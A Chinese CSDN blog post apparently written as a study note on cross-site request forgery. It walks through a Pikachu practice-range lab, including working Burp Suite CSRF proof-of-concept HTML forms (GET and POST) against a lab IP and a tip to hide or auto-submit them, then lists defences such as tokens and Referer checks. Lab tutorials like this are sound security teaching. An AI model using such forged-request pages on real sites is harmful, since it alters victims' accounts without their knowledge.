CSRF漏洞原理

已于 2023-12-08 23:23:47 修改
阅读量72 收藏
点赞数
分类专栏: Web安全学习 文章标签: csrf 安全 网络 web安全 安全架构 安全威胁分析 网络安全
于 2023-12-08 23:22:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56188299/article/details/134887126
版权
本文详细解释了CSRF攻击的工作原理,涉及登录流程、伪造请求过程,以及提供了一些建立在GET和POST请求上的攻击示例。同时介绍了常见的CSRF防御策略,如Token验证、安全会话管理和访问控制措施。
摘要由CSDN通过智能技术生成

漏洞描述

        CSRF:跨站请求伪造 ,是一种挟持用户在当前已登录的Web应用程序上执行攻击者的操作的攻击方法。直白的说就是,攻击者通过利用技术手段欺骗用户的浏览器去访问自己曾经登录认证过的网站并执行一些操作(比如购买商品,发送消息)由于浏览器曾经认证过,所以网站以为是正真的用户在执行操作。

攻击原理

用户打开浏览器,访问并登录某个信任的A网站。

在用户登录成功后,服务器返回一个cookie给浏览器。

用户未退出网站的同时,打开了黑客编写的危险网站

黑客的网站收到用户的请求后,会返回一些恶意代码,并发出请求要求访问A网站

浏览器收到这些恶意代码后,用户在不知情的情况下,利用cookie信息,向A网站发送恶意请求,网站A会更具cookie信息以用户的权限去处理该请求,导致来自黑客网站的恶意代码别执行。

偷个月师傅的图

CSRF漏洞攻击(皮卡丘靶场的CSRF漏洞练习)

1.CSRF(get)

步骤一:正常登录(用户视角)

用户名:vince (之前sql注入那里获得的)

密码:123456

登录成功

在这里我们发现有个修改个人信息

步骤二:抓包查看这个表单的内容(分析者视角)

发送的请求使用了get'方式传递我们要修改的参数并且携带了cookie。

步骤三:构建伪造的请求(黑客视角)

在这里我们可以直接使用BurpSuite的工具,生成CSRF Poc

Poc的内容就是简单的构建了一个表单,表单提交地址是用户刚刚登录的网站,表单中的内容就是刚才修改用户信息中的内容,但是提前给其赋值,用户在不知情的情况下就用这个表单加上自己的cookie请求了服务器,服务器以为是用户正常操作。至此攻击就结束了。

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.217.135/06/vul/csrf/csrfget/csrf_get_edit.php">
      <input type="hidden" name="sex" value="csrf" />
      <input type="hidden" name="phonenum" value="csrf" />
      <input type="hidden" name="add" value="csrf" />
      <input type="hidden" name="email" value="csrf" />
      <input type="hidden" name="submit" value="submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

第四步:将准备好的CSRFPoc文件放入自己的网站,并将这个链接发送给用户让其请求(黑客视角)

随便放入一个我们之前创建好的网站根目录中

将127.0.0.1\CSRFPoc.html网址发送发给用户让其请求一下。

步骤五:用户请求浏览器,攻击成功(受害者视角)

当然这里我们可以将这个空白页面写成别的样子,反正表单并不会被看见,甚至我们可以将表单设置为自动提交,用户就不会发现任何异常。

用户视角中人信息已经被修改成功。

2.CSRF(POST)

原理和步骤一模一样,只有在CSRF(get)中第三步构建的CSRFPoc中的表单提交方式不同具体如下。

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.217.135/06/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
      <input type="hidden" name="sex" value="a" />
      <input type="hidden" name="phonenum" value="a" />
      <input type="hidden" name="add" value="a" />
      <input type="hidden" name="email" value="a" />
      <input type="hidden" name="submit" value="submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

这里的method改成了post,之前是get,其他的均一样。

CSRF防御方案

1.增加Token验证(常用做法)

        对关键的操作增加Token参数,每次都不一样

2.添加关于安全的会话管理(避免被利用)

        不要在客户端保存敏感信息

        退出或者关闭浏览器时会话结束。

        设置会话过期机制,比如15分钟无操作就需要重新登录。

3.访问控制安全管理

        修改敏感信息或做敏感操作的时候需要二次认证。

        使用post传递敏感信息

        通过HTTP头中的Refereer字段,来判断请求的来源。

4.增加验证码

       

无敌的大脸狗
关注
专栏目录
CSRF漏洞概述及原理;通过CSRF进行地址修改实验演示;
qq_44696653的博客
05-05 339
CSRF漏洞概述和原理 cross-site request forgery简称为”CSRF“。 在CSRF的攻击场景中攻击者会伪造一个请求(一般是一个链接) 然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击也就完成了。所以CSRF攻击也被称为”one click“攻击。 CSRF攻击成功的条件: 1.网站没有进行防范CSRF的处理。 2.攻击目标在点击链接时登陆了相关网站。 CSRF漏...
DVWA靶场笔记之csrf漏洞原理
Alonegrief的博客
11-20 1398
DVWA漏洞源码分析——(三)csrf Csrf原理Csrf中文称为跨站请求伪造,利用受害者未失效的身份认证信息(cookie,会话等)诱骗其点击恶意链接或者去访问攻击者构造的含有攻击代码的页面,在受害者不知情的情况下,以受害者的身份向服务器发送请求,从而达到一些非法操作(转账,改密)。 Csrf和xss的攻击方式有点相似,但是不同的是: (1) csrf需要登录后才能操作,xss不需要 (2) csrf是请求页面api来时先非法操作,xss是先当前页面植入js脚本来修改页面内容 例子: 这里我们用dv
csrf漏洞原理
weixin_48776804的博客
02-16 482
pikachu中csrf漏洞
CSRF漏洞原理/防御
热门推荐
wangyuxiang946的博客
07-12 1万+
CSRF是指攻击者利用已登录的用户身份 , 伪造用户请求 , 从而执行非法操作
CSRF漏洞详解
xcxhzjl的博客
11-19 3263
一、CSRF漏洞原理 1、基本原理 CSRF(Cross-site Request Forgery,跨站请求伪造)是一种针对网站的恶意利用。 CSRF攻击可以利用用户已经登陆或已经授权的状态,伪造合法用户发出请求给受信任的网点,从而实现在未授权的情况下执行一些特权操作。 CSRF与XSS听起来很像,但攻击方式完全不同。XSS攻击是利用受信任的站点攻击客户端用户,而CSRF是伪装成受信任的用户攻击受信任的站点。 2、流程图 3、条件 ●用户成功登陆了网站系统,能执行授权的功能 ●目标用户访
CSRF漏洞原理说明与利用方法
liu0yun的博客
06-20 1600
一 、什么是CSRF Cross-SiteRequestForgery(CSRF),中文一般译作跨站请求伪造。经常入选owasp漏洞列表Top10,在当前web漏洞排行中,与XSS和SQL注入并列前三。与前两者相比,CSRF相对来说受到的关注要小很多,但是危害却非常大。 通常情况下,有三种方法被广泛用来防御CSRF攻击:验证token,验证HTTP请求的Referer,还有验证XMLHttpRequests里的自定义header。鉴于种种原因,这三种方法都不是那么完美,各有利弊。 二、CSRF...
CSRF漏洞原理与防御方式
dreamthe的博客
09-17 2095
CSRF漏洞原理 CSRF被叫做跨站请求伪造,该怎么理解这句话呢,比如 用户a在浏览器登录了账号,当他发送登录请求时候,服务器验证了账号密码,会返回给一个身份信息存放在cookie里面,浏览器保存,那么以后用户访问服务器带着这个cookie就行了。那么怎么产生攻击的呢,是用户在已经登录的状态下,访问了一个恶意的网站,带浏览器保存的cookie值向服务器发送了恶意请求,服务器会以为是用户的请求,其实这是用户不知情的请求。垮了两个站,一个是用户登录实际网站,一个屙屎攻击者恶意构造网站,所以称作跨站请求伪造。
CSRF漏洞概述及原理
m0_74131821的博客
04-03 658
CSRF 漏洞经常被用来制作蠕虫攻击、刷 SEO 流量等
DWVA之csrf漏洞原理、防御及练习
m0_71635484的博客
03-16 487
DWVA之csrf漏洞原理、防御及练习
CSRF漏洞——原理及防御
cldimd的博客
03-21 6977
CSRF漏洞原理 CSRF(Cross Site Request Forgery, 跨站请求伪造)是一种网络的攻击方式,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF。 CSRF漏洞是因为web应用程序在用户进行敏感操作时,如修改账号密码、添加账号、转账等,没有校验表单token或者http请求头中的r...
CSRF漏洞原理攻击与防御(非常细)
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
03-14 4191
CSRF (Cross-site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户请求受信任的网站。简单的说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己以前认证过的站点并运行一些操作(如发邮件,发消息,甚至财产操作(如转账和购买商品))。
csrf漏洞概述及原理
weixin_43534549的博客
05-01 200
emmmmmm…
Csrf漏洞概述及其原理
gl620321的博客
05-01 7093
一.Csrf漏洞的概述 1.CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户的请求来利用受信任的网站。与XSS攻击相比,C...
Web安全原理剖析(十九)——CSRF漏洞原理
Phantom03167的博客
01-07 714
CSRF漏洞原理
CSRF漏洞原理全家桶、面试法宝
YH,生活越来越好
04-27 943
CSRF(Cross-site request forgery)跨站请求伪造,是一种劫持用户身份,以用户名义进行非预期操作,通常发生在用户在访问恶意网站或收到恶意邮件后。攻击者通过一些方式诱使用户进入一个恶意网站,然后在该站点中插入一个链接或表单,该链接或表单通过用户的浏览器发出非预期的请求,伪造用户身份执行某种操作,如修改密码、转账、发布帖子等。CSRF与XSS听起来很像,但攻击方式完全不同。XSS攻击是利用受信任的站点攻击客户端用户,而CSRF是伪装成受信任的用户攻击受信任的站点。
CSRF 漏洞解释,原理以及防御等
guoweicsdn2017的博客
10-12 2193
CSRF 漏洞解释,原理以及防御等 漏洞解释 CSRF:跨站请求伪造(Cross-site-request-forgery)本质是攻击者伪造了合法的身份(用户点击),对系统进行访问 漏洞原理 原理:在开发程序的时候,未对相关页面进行token和referer验证,从而导致了 攻击者可以构造自己的url地址来欺骗目标用户点击 漏洞防御 #防御方案 1、验证Http referer字段 2、在请求地址中添加token并验证 3、设置验证码 4、当用户发送重要的请求时需要输入原始密码 5、限制请求方式只能为 PO
web安全】深入理解CSRF漏洞原理及利用方式
weixin_34390996的博客
09-11 359
对于web客户端的攻击,除了首当其冲的XSS以外,CSRF也是一个非常重要的安全漏洞CSRF漏洞是跨站请求伪造,也有少数文章中称其XSRF,其实指的是同一个东西。这个漏洞原理要分两层,狭义的CSRF和广义的CSRF。狭义的CSRF是指在黑客已经将代码植入受害用户的浏览器访问的页面的前提下,以“受害用户”的身份向服务端发起一个伪造的ht...
网络安全CSRF漏洞:攻击原理、检测方法和防范措施
yyyyyybw的博客
09-27 899
CSRF漏洞是一种常见的网络安全威胁,但通过采取适当的防范措施,开发人员可以有效地保护他们的应用程序免受这种攻击的影响。渗透测试CSRF漏洞是一种重要的安全实践,帮助发现并解决潜在的风险。通过理解CSRF攻击的原理和防范措施,您可以更好地保护您的应用程序和用户的安全。如果你也想学网络安全渗透测试技术,你可以领取下面这套入门到进阶提升视频教程+配套笔记资料学习,希望可以帮到你!网络安全(黑客)自学笔记+学习路线+配套视频教程(超详细)t=N7T8。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值